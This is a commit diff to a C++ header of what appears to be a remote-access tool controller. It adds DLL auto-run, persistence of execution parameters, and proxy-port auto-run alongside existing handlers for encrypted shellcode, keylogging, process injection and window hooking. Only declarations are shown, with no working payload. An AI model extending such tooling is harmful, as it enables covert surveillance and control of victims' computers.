Feature: DLL executing parameters persistence and DLL auto-run
This commit is contained in:
@@ -35,6 +35,9 @@ typedef struct DllInfo {
|
||||
{
|
||||
SAFE_DELETE(Data);
|
||||
}
|
||||
DllExecuteInfo* GetInfo() {
|
||||
return (DllExecuteInfo*)(Data->Buf() + 1);
|
||||
}
|
||||
} DllInfo;
|
||||
|
||||
typedef struct FileTransformCmd {
|
||||
@@ -449,6 +452,7 @@ public:
|
||||
afx_msg void OnShellcodeAesBin();
|
||||
afx_msg void OnShellcodeTestAesBin();
|
||||
afx_msg void OnToolReloadPlugins();
|
||||
afx_msg void OnToolPluginSettings();
|
||||
afx_msg void OnShellcodeAesCArray();
|
||||
afx_msg void OnParamKblogger();
|
||||
afx_msg void OnOnlineInjNotepad();
|
||||
@@ -457,7 +461,7 @@ public:
|
||||
afx_msg void OnParamPrivacyWallpaper();
|
||||
afx_msg void OnParamFileV2();
|
||||
afx_msg void OnParamRunAsUser();
|
||||
void ProxyClientTcpPort(bool isStandard);
|
||||
void ProxyClientTcpPort(bool isStandard, bool autoRun=false);
|
||||
afx_msg void OnProxyPort();
|
||||
afx_msg void OnHookWin();
|
||||
afx_msg void OnRunasService();
|
||||
@@ -481,4 +485,5 @@ public:
|
||||
afx_msg void OnMasterTrail();
|
||||
afx_msg void OnCancelShare();
|
||||
afx_msg void OnWebRemoteControl();
|
||||
afx_msg void OnProxyPortAutorun();
|
||||
};
|
||||
|
||||
Reference in New Issue
Block a user